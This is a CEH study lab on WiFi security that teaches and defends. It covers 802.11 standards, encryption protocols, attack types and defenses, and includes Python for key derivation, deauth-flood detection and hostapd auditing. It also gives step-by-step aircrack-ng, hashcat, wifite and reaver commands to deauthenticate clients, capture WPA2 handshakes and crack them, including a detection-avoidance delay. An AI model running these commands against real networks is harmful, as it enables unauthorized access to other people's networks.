CEH v12 Chapter 16 - Comprehensive Reference Lab
Master the fundamentals of wireless security, from 802.11 standards to advanced attack techniques. This lab covers WiFi encryption protocols, authentication methods, and practical exploitation tools used in professional penetration testing.
Legal Notice: The techniques and tools described in this lab are for authorized penetration testing and educational purposes only. Unauthorized access to wireless networks is illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
You must have explicit written permission before testing any wireless network you do not own. Violation of these laws can result in severe criminal penalties including imprisonment and substantial fines.
Practice responsibly: Use isolated test environments, your own equipment, or authorized lab setups only.
| Standard | Year | Frequency | Max Speed | Range (Indoor) | Status |
|---|---|---|---|---|---|
| 802.11a | 1999 | 5 GHz | 54 Mbps | ~35 meters | Legacy |
| 802.11b | 1999 | 2.4 GHz | 11 Mbps | ~50 meters | Legacy |
| 802.11g | 2003 | 2.4 GHz | 54 Mbps | ~50 meters | Common |
| 802.11n (WiFi 4) | 2009 | 2.4/5 GHz | 600 Mbps | ~70 meters | Active |
| 802.11ac (WiFi 5) | 2014 | 5 GHz | 3.5 Gbps | ~50 meters | Active |
| 802.11ax (WiFi 6) | 2019 | 2.4/5 GHz | 9.6 Gbps | ~50 meters | Current |
2.4 GHz Band (2.400 - 2.4835 GHz):
5 GHz Band (5.150 - 5.825 GHz):
| Protocol | Encryption | Key Size | Authentication | Security Status | Crack Time |
|---|---|---|---|---|---|
| Open | None | N/A | None | VULNERABLE | Immediate |
| WEP | RC4 | 64/128-bit | Pre-shared key | BROKEN | < 1 minute |
| WPA (TKIP) | RC4 + TKIP | 128-bit | PSK or 802.1X | DEPRECATED | Hours to days |
| WPA2 (AES) | AES-CCMP | 128-bit | PSK or 802.1X | VULNERABLE* | Depends on password |
| WPA3 (SAE) | AES-GCMP | 128/192-bit | SAE (Dragonfly) | SECURE | Resistant to offline attacks |
* WPA2 is vulnerable to the KRACK attack and to offline cracking of weak passwords
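The "Depends on password" entry above follows from how WPA2-PSK derives its key. Added example, not part of the original lab: a Python reproduction of the PBKDF2 step checked against the IEEE 802.11 test vector, plus a keyspace calculator that uses an assumed, placeholder guess rate.

```python
import hashlib
import math

# 802.11i (WPA2-PSK) key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations,
# 32 bytes). An offline cracker must repeat exactly this step for every candidate passphrase
# once it holds a captured 4-way handshake, which is why crack time depends on the password.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit Pairwise Master Key from a WPA2-PSK passphrase and its SSID salt."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrases must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
                               PBKDF2_ITERATIONS, PMK_LEN)

def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a passphrase chosen uniformly at random: log2(alphabet_size ** length)."""
    return length * math.log2(alphabet_size)

def worst_case_crack_seconds(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Seconds to exhaust the whole keyspace at an assumed PMK-derivation rate (hardware dependent)."""
    return (alphabet_size ** length) / guesses_per_second

if __name__ == "__main__":
    # IEEE 802.11 Annex J test vector: passphrase "password", SSID "IEEE".
    print(wpa2_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: the SSID salt means a precomputed table only
    # helps against that one network name.
    print(wpa2_pmk("password", "IEEE") == wpa2_pmk("password", "ieee"))
    # Assumed placeholder rate of 1,000,000 PMK derivations/s; compare an 8-digit PIN-style
    # passphrase with the table's 20+ random printable ASCII characters (94-symbol alphabet).
    RATE = 1_000_000
    for alphabet, length in ((10, 8), (94, 20)):
        years = worst_case_crack_seconds(alphabet, length, RATE) / 31_536_000
        print(f"{length} chars from {alphabet} symbols: "
              f"{keyspace_bits(alphabet, length):.1f} bits, {years:.3g} years worst case")
```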
Open network: No encryption or authentication required. Anyone can connect and all traffic is visible in plaintext. Risk: man-in-the-middle attacks, eavesdropping, data interception.

Evil twin (CRITICAL): The attacker creates a fake AP with the same or a similar SSID as the legitimate network. Users unknowingly connect, allowing traffic interception.
Tools: hostapd, airbase-ng, WiFi Pineapple

Deauthentication attack (HIGH): Spoofed deauth frames disconnect clients from the AP, forcing a reconnection whose handshake can be captured, or redirecting the client to an evil twin.
Tools: aireplay-ng, mdk4, scapy

Handshake capture (CRITICAL): The 4-way handshake is captured while a client authenticates. This allows offline password cracking with a dictionary or brute force.
Tools: airodump-ng, Wireshark, tcpdump

Password cracking (CRITICAL): Offline attack on a captured handshake using wordlists or brute force. Success depends on password complexity.
Tools: aircrack-ng, hashcat, John the Ripper

KRACK (CRITICAL): The Key Reinstallation Attack exploits the WPA2 4-way handshake, forcing nonce reuse and allowing packet replay and decryption.
CVE: CVE-2017-13077 to CVE-2017-13088

KARMA attack (HIGH): A rogue AP responds to client probe requests for previously connected networks, and the device automatically connects to it.
Tools: MANA toolkit, WiFi Pineapple

Packet sniffing (MEDIUM): Monitor mode capture of wireless traffic. On open networks, or with the key, all traffic is visible, including credentials and sensitive data.
Tools: Wireshark, tcpdump, Kismet

Jamming (HIGH): Denial of service by flooding channels with noise or deauth frames, disrupting wireless communications.
Tools: mdk4, aireplay-ng, RF jammers

WPS PIN attack (CRITICAL): The WiFi Protected Setup PIN is only 8 digits. A brute force attack can recover the WPA/WPA2 password in hours.
Tools: Reaver, Bully, Pixie Dust attack
Methodology:
1. Put the wireless adapter into monitor mode to capture all wireless traffic: `airmon-ng start wlan0`
2. Scan for available wireless networks and identify the target AP: `airodump-ng wlan0mon`
3. Lock onto the target channel and BSSID and save the capture to a file: `airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon`
4. Send deauth packets to force a client reconnection and capture the handshake: `aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon`
5. Run a dictionary or brute force attack on the captured handshake: `aircrack-ng -w rockyou.txt -b XX:XX:XX:XX:XX:XX capture-01.cap`
Aircrack-ng suite:
```bash
# 1. Enable monitor mode
airmon-ng start wlan0
# 2. Kill interfering processes (NetworkManager, wpa_supplicant); usually run
#    before step 1, and restart those services when finished
airmon-ng check kill
# 3. Scan for networks
airodump-ng wlan0mon
# 4. Capture on specific channel and BSSID
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# 5. Deauthenticate client (in new terminal)
# -0 = deauth attack, 5 = number of deauth packets
# -a = AP BSSID, -c = client MAC
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# 6. Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# 7. Stop monitor mode when done
airmon-ng stop wlan0mon
```
Wifite:
```bash
# Automated WPA/WPA2 attack with dictionary
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
# Attack specific target
wifite --bssid AA:BB:CC:DD:EE:FF --wpa
# Attack WPS-enabled networks
wifite --wps
# Increase verbosity and skip already cracked
wifite -v --skip-crack
```
Hashcat:
```bash
# Convert .cap to hashcat format (hc22000)
hcxpcapngtool -o capture.hc22000 capture-01.cap
# Crack WPA2 handshake with hashcat
# -m 22000 = WPA-PBKDF2-PMKID+EAPOL mode
hashcat -m 22000 -a 0 capture.hc22000 rockyou.txt
# Brute force attack (all combinations)
hashcat -m 22000 -a 3 capture.hc22000 ?d?d?d?d?d?d?d?d
# Show cracked passwords
hashcat -m 22000 capture.hc22000 --show
```
Reaver:
```bash
# Attack WPS PIN (8-digit brute force)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Use Pixie Dust attack (faster if vulnerable)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K -vv
# Add delay between attempts (avoid detection)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 5 -vv
```
Kismet:
```bash
# Start Kismet (opens web interface on localhost:2501)
kismet
# Run with a specific capture interface
kismet -c wlan0
# Kismet can detect hidden SSIDs, clients, and WPS-enabled APs
```
Wireshark and tcpdump:
```bash
# Capture WiFi traffic
wireshark
# Wireshark display filters (enter in the filter bar):
# Filter for EAPOL handshake packets
eapol
# Filter for deauthentication frames
wlan.fc.type_subtype == 0x0c
# Filter for beacon frames
wlan.fc.type_subtype == 0x08
# Command line packet capture
tcpdump -i wlan0mon -w capture.pcap
```
Defense recommendations:
- Upgrade to WPA3: WPA3 provides forward secrecy and protection against offline dictionary attacks, and its mandatory management frame protection prevents deauth attacks.
- Strong passphrases: If WPA2-PSK must be used, choose a long random passphrase that resists dictionary attacks.
- 802.1X enterprise authentication: Deploy RADIUS-based authentication for centralized control and per-user encryption keys.
- Wireless intrusion detection: Deploy monitoring systems to detect rogue APs, evil twins, and attacks.
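Added example, not from the original lab: a Python parser for the 802.11 Frame Control field (the same type/subtype values the Wireshark filters above use) and a rate-based deauth flood alert of the kind a wireless IDS raises, run over a constructed sample capture. The MAC addresses, window size and threshold are assumptions.

```python
from collections import defaultdict

# wlan.fc.type_subtype in Wireshark is (type << 4) | subtype; both live in the first byte
# of the 802.11 Frame Control field (bits 0-1 version, 2-3 type, 4-7 subtype).
BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C

def type_subtype(frame: bytes) -> int:
    return (((frame[0] >> 2) & 0x3) << 4) | ((frame[0] >> 4) & 0xF)
def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame: bytes) -> dict:
    """Parse the 24-byte management header (FC, Duration, Addr1-3, SeqCtl) and any reason code."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    info = {"type_subtype": type_subtype(frame), "da": mac_str(frame[4:10]),
            "sa": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    if info["type_subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = int.from_bytes(frame[24:26], "little")  # 2-byte little-endian body
    return info

def build_mgmt(ts: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Assemble a bare management frame for the constructed sample below (never transmitted)."""
    fc0 = ((ts & 0xF) << 4) | ((ts >> 4) << 2)
    return bytes([fc0, 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body

def deauth_flood_sources(capture, window_s: float = 2.0, threshold: int = 10) -> dict:
    """Peak deauth/disassoc count per source MAC in any window_s-second window, if >= threshold."""
    stamps = defaultdict(list)
    for t, frame in capture:
        if type_subtype(frame) in (DEAUTH, DISASSOC):
            stamps[mac_str(frame[10:16])].append(t)
    alerts = {}
    for sa, times in stamps.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[sa] = peak
    return alerts

# Constructed sample: a beacon, one ordinary deauth (reason 3), then 15 broadcast deauths
# (reason 7) within 1.4 s claiming to come from the AP, the shape of a deauth flood.
AP, STA, BCAST = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566"), b"\xff" * 6
SAMPLE_CAPTURE = [(0.0, build_mgmt(BEACON, BCAST, AP, AP)),
                  (5.0, build_mgmt(DEAUTH, STA, AP, AP, (3).to_bytes(2, "little")))]
SAMPLE_CAPTURE += [(100.0 + i * 0.1, build_mgmt(DEAUTH, BCAST, AP, AP, (7).to_bytes(2, "little")))
                   for i in range(15)]
```

With 802.11w enabled, a legitimate AP's deauth frames are integrity protected, so unprotected deauths claiming its address are themselves a signal worth alerting on.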
| Defense Measure | Effectiveness | Implementation Cost | Notes |
|---|---|---|---|
| MAC Address Filtering | LOW | Free | Easily bypassed by MAC spoofing. Security through obscurity. |
| Hidden SSID | LOW | Free | SSID revealed in probe requests. Provides no real security. |
| Strong WPA2 Password | MEDIUM-HIGH | Free | 20+ random characters resistant to cracking. Still vulnerable to KRACK. |
| WPA3 SAE | HIGH | Free (hardware support) | Best for home/SOHO. Requires WPA3-capable devices. |
| 802.1X Enterprise | VERY HIGH | Medium (RADIUS server) | Best for enterprise. Requires infrastructure and management. |
| Disable WPS | CRITICAL | Free | WPS PIN easily brute forced. Always disable in production. |
| Guest Network Isolation | HIGH | Free | Separate guest traffic from internal network. Reduces attack surface. |
| Wireless IDS/IPS | HIGH | High (enterprise) | Detects attacks in real-time. Automated response possible. |
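Added example, not from the original lab: a Python audit of a hostapd configuration against the rows of the table above (WPA3 SAE, management frame protection, WPS disabled, no TKIP, a 20+ character PSK). The two configuration fragments, the finding codes and the default assumed for wpa_key_mgmt are constructed for the example.

```python
# Constructed hostapd.conf fragments: the weak one enables several settings the table
# above warns about; the hardened one follows its WPA3 / PMF / disable-WPS advice.
WEAK_CONF = """\
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=guest1234
ieee80211w=0
wps_state=2
"""
HARDENED_CONF = """\
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=REPLACE-WITH-20-PLUS-RANDOM-CHARACTERS
ieee80211w=2
wps_state=0
"""

def parse_hostapd(text: str) -> dict:
    """Minimal key=value parser; hostapd ignores blank lines and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd(text: str) -> list:
    """Return (code, severity) findings that map onto rows of the defense table."""
    c = parse_hostapd(text)
    if c.get("wpa", "0") == "0":                  # hostapd default: no WPA/RSN at all
        return [("OPEN_NETWORK", "CRITICAL")]
    findings = []
    key_mgmt = c.get("wpa_key_mgmt", "WPA-PSK WPA-EAP").split()   # assumed default
    ciphers = (c.get("wpa_pairwise", "") + " " + c.get("rsn_pairwise", "")).split()
    if c["wpa"] in ("1", "3"):                    # WPA1 allowed alongside or instead of WPA2
        findings.append(("WPA1_ENABLED", "HIGH"))
    if "TKIP" in ciphers:
        findings.append(("TKIP_CIPHER", "HIGH"))
    if "WPA-PSK" in key_mgmt and "SAE" not in key_mgmt:
        findings.append(("PSK_WITHOUT_SAE", "LOW"))  # handshake crackable offline
        if "wpa_psk" not in c and len(c.get("wpa_passphrase", "")) < 20:
            findings.append(("SHORT_PSK", "MEDIUM"))
    if c.get("ieee80211w", "0") != "2":           # 2 = management frame protection required
        findings.append(("NO_PMF", "HIGH"))       # spoofed deauth frames are accepted
    if c.get("wps_state", "0") != "0":
        findings.append(("WPS_ENABLED", "CRITICAL"))
    return findings
```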